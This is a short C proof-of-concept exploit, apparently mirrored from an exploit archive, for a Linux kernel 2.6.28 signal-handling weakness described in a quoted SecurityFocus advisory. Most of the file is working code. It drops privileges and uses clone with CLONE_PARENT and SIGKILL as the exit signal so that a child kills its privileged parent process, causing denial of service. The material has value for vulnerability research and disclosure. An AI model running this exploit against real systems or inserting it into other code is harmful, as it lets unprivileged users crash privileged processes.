43 lines
No EOL
1.1 KiB
C
43 lines
No EOL
1.1 KiB
C
/*
|
|
source: https://www.securityfocus.com/bid/33906/info
|
|
|
|
The Linux kernel is prone to an origin-validation weakness when dealing with signal handling.
|
|
|
|
This weakness occurs when a privileged process calls attacker-supplied processes as children. Attackers may exploit this to send arbitrary signals to the privileged parent process.
|
|
|
|
A local attacker may exploit this issue to kill vulnerable processes, resulting in a denial-of-service condition. In some cases, other attacks may also be possible.
|
|
|
|
Linux kernel 2.6.28 is vulnerable; other versions may also be affected.
|
|
*/
|
|
|
|
#include <sched.h>
|
|
#include <signal.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
|
|
static int the_child(void* arg) {
|
|
sleep(1);
|
|
_exit(2);
|
|
}
|
|
|
|
int main(int argc, const char* argv[]) {
|
|
int ret = fork();
|
|
if (ret < 0)
|
|
{
|
|
perror("fork");
|
|
_exit(1);
|
|
}
|
|
else if (ret > 0)
|
|
{
|
|
for (;;);
|
|
}
|
|
setgid(99);
|
|
setuid(65534);
|
|
{
|
|
int status;
|
|
char* stack = malloc(4096);
|
|
int flags = SIGKILL | CLONE_PARENT;
|
|
int child = clone(the_child, stack + 4096, flags, NULL);
|
|
}
|
|
_exit(100);
|
|
} |